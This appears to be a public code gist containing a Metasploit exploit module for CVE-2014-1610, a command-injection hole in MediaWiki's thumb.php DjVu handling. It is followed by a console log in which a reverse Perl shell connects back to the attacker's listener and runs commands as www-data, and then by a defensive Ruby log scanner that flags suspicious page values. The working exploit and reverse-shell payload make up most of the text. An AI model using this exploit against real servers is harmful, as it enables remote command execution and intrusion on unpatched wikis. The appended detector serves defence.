@brandonprry
Last active December 28, 2016 11:46
Quick mediawiki thumb.php exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mediawiki thumb.php Djvu Remote Command Execution",
      'Description'    => %q{
        Mediawiki uses djvulibre to convert djvu files to jpeg thumbnails.
        The page parameter when creating these thumbnails is vulnerable to remote
        command execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brandon Perry'
        ],
      'References'     =>
        [
          ['CVE', '2014-1610']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x20&",
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python',
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Mediawiki', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 28 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'Name of the Djvu image to thumbnail', 'example.djvu' ]),
        OptString.new('TARGETURI', [ true, 'Relative URI of the Mediawiki install', '/mediawiki/']),
      ], self.class)
  end

  def exploit
    send_request_cgi({
      'uri' => normalize_uri(target_uri, '/thumb.php?f=' + datastore['FILENAME'] + "&width=100&page=2`"+payload.encoded+"`"),
    })
  end
end

__END__
msf exploit(mediawiki_djvu_thumb_exec) > show options

Module options (exploit/linux/http/mediawiki_djvu_thumb_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILENAME   superhero.djvu   yes       Name of the Djvu image to thumbnail
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.48     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /mediawiki/      yes       Relative URI of the Mediawiki install
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.31     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Mediawiki

msf exploit(mediawiki_djvu_thumb_exec) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Command shell session 2 opened (192.168.1.31:4444 -> 192.168.1.48:58049) at 2014-01-31 19:48:38 -0600
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux ubuntu 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
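
A defender-side check for the request shape the module above sends, added here as an example (it is not part of the original gist or of Metasploit): it scans web access logs for `thumb.php` requests whose `page` parameter is anything other than a plain integer. The log lines, client addresses and the `PLACEHOLDER` token are constructed, and the function names are hypothetical.

```ruby
require 'uri'

# Constructed access-log lines (combined log format), not taken from the page.
SAMPLE_LOG = <<~'LOG'
  192.0.2.10 - - [31/Jan/2014:19:40:01 -0600] "GET /mediawiki/thumb.php?f=example.djvu&width=100&page=2 HTTP/1.1" 200 5120
  198.51.100.77 - - [31/Jan/2014:19:48:38 -0600] "GET /mediawiki/thumb.php?f=example.djvu&width=100&page=2%60PLACEHOLDER%60 HTTP/1.1" 500 312
  192.0.2.10 - - [31/Jan/2014:19:50:12 -0600] "GET /mediawiki/index.php?title=Main_Page&page=intro HTTP/1.1" 200 9001
  198.51.100.78 - - [31/Jan/2014:19:51:02 -0600] "GET /mediawiki/thumb.php?f=example.djvu&page=1`PLACEHOLDER` HTTP/1.1" 500 312
  198.51.100.79 - - [31/Jan/2014:19:52:40 -0600] "GET /mediawiki/thumb.php?f=example.djvu&page=3&page=4%3Bx HTTP/1.1" 500 312
LOG

REQUEST_RE = %r{"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"}
THUMB_RE   = %r{/thumb\.php(?:/|\z)}i

# Percent-decode a component; nil when the encoding itself is malformed.
def decode(component)
  URI.decode_www_form_component(component).scrub
rescue ArgumentError
  nil
end

# Returns every decoded `page` value on a thumb.php request that is not a
# plain integer ([] when the line is clean or is not a thumb.php request).
def suspicious_page_values(line)
  target = line[REQUEST_RE, 1] or return []
  path, query = target.split('?', 2)
  return [] unless query && decode(path).to_s.match?(THUMB_RE)

  query.split('&').filter_map do |pair|
    key, value = pair.split('=', 2)
    next unless decode(key.to_s) == 'page'
    decoded = decode(value.to_s)
    # Report the decoded value, or the raw one if it could not be decoded.
    (decoded || value) unless decoded&.match?(/\A\d+\z/)
  end
end

# Scans a whole log and returns one record per offending request.
def scan(log)
  log.each_line.filter_map do |line|
    values = suspicious_page_values(line)
    { client: line.split(' ', 2).first, values: values } unless values.empty?
  end
end

scan(SAMPLE_LOG).each { |hit| puts "#{hit[:client]} page=#{hit[:values].inspect}" } if $PROGRAM_NAME == __FILE__
```

Every `page` occurrence is checked, not only the last, so a benign value followed by a duplicate parameter is still reported; both raw and percent-encoded metacharacters are caught because the test runs on the decoded value.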